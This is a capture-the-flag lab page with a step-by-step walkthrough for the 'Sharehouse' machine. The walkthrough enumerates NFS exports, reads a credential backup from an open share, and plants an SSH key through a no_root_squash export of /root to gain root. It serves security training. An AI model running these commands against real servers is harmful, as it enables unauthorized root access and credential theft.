RatLabs
🐀🐀 0 pts earned

Sharehouse

An NFS server quietly advertises its shares to anyone who asks — and one of them holds a credential backup. The other exports the root home directory with no_root_squash, trusting that no one outside the team has root on their machine. They were wrong.

🕐 Launching Soon

Launching in calculating...

Machine may be having trouble (checked 15m ago)
Target IP Log in to reveal
User Flag Pending
Root Flag Pending

Premium

Walkthrough, Tips and Tricks

Walkthrough

Objective

Exploit misconfigured NFS exports to recover credentials and escalate to root by planting an SSH authorized key via a no_root_squash share.

Attack Narrative

The ops team configured NFS for an internal backup agent and never revisited the export policy. Two shares are exposed: one contains a credential backup file, the other exports /root with no_root_squash — allowing any root-privileged NFS client to write root-owned files on the server. Chaining these two misconfigurations delivers a full compromise.

Prerequisites

  • NFS client tools (showmount, mount.nfs).
  • Root access on your attacker machine (required to mount as uid 0).
  • SSH key pair generation.

Phase 1: Service Discovery

  1. Scan the target — ports 22, 111, and 2049.
  2. Enumerate NFS exports:
showmount -e TARGET

Expected output:

Export list for TARGET:
/root        *
/srv/nfsdata *

Phase 2: Mount the Public Share

mkdir /mnt/nfsdata
mount -t nfs TARGET:/srv/nfsdata /mnt/nfsdata
cat /mnt/nfsdata/credentials.bak

Credentials found:

ssh_user=labuser
ssh_pass=NfsBackup2024!

umount /mnt/nfsdata

Phase 3: Initial Access

ssh labuser@TARGET
cat ~/user.txt

Phase 4: Exploit no_root_squash

The /root export uses no_root_squash: files written by root on the NFS client are owned by root on the server.

On your attacker machine (as root):

# Generate an SSH key pair
ssh-keygen -t ed25519 -f /tmp/nfslab_key -N ""

# Mount the remote /root
mkdir /mnt/nfsroot
mount -t nfs TARGET:/root /mnt/nfsroot

# Plant the public key
mkdir -p /mnt/nfsroot/.ssh
cat /tmp/nfslab_key.pub >> /mnt/nfsroot/.ssh/authorized_keys
chmod 700 /mnt/nfsroot/.ssh
chmod 600 /mnt/nfsroot/.ssh/authorized_keys

umount /mnt/nfsroot

Phase 5: Root Shell

ssh -i /tmp/nfslab_key root@TARGET
cat /root/root.txt

Troubleshooting

  • showmount times out: ensure ports 111 and 2049 are reachable; try rpcinfo -p TARGET.
  • mount fails: install nfs-common (apt install nfs-common); check if you're running as root.
  • SSH key rejected: verify /root/.ssh/authorized_keys permissions (700/600); confirm root SSH login is permitted.

Verification Checklist

  • NFS exports enumerated with showmount.
  • /srv/nfsdata mounted and credentials.bak read.
  • SSH as labuser, user flag captured.
  • /root mounted via NFS as local root, authorized_keys planted.
  • SSH as root, root flag captured.
Tips and Tricks

Tips and Tricks

  • showmount -e is the standard NFS recon command — run it as soon as you see port 2049.
  • no_root_squash means: root on the client = root on the server. Always check this option in exports.
  • If mount is slow, add -o vers=3 to force NFSv3.
  • Mounting writable shares: create files as root on your client; they will appear root-owned on the remote.
  • After planting the key, double-check authorized_keys permissions — SSH is strict about 0600.

Useful Commands

showmount -e TARGET
rpcinfo -p TARGET
mount -t nfs -o vers=3 TARGET:/srv/nfsdata /mnt/nfsdata
mount -t nfs -o vers=3 TARGET:/root /mnt/nfsroot
ssh-keygen -t ed25519 -f /tmp/nfslab_key -N ""

Community

Community Walkthroughs

No community walkthroughs yet — be the first!

Log in to submit your own walkthrough.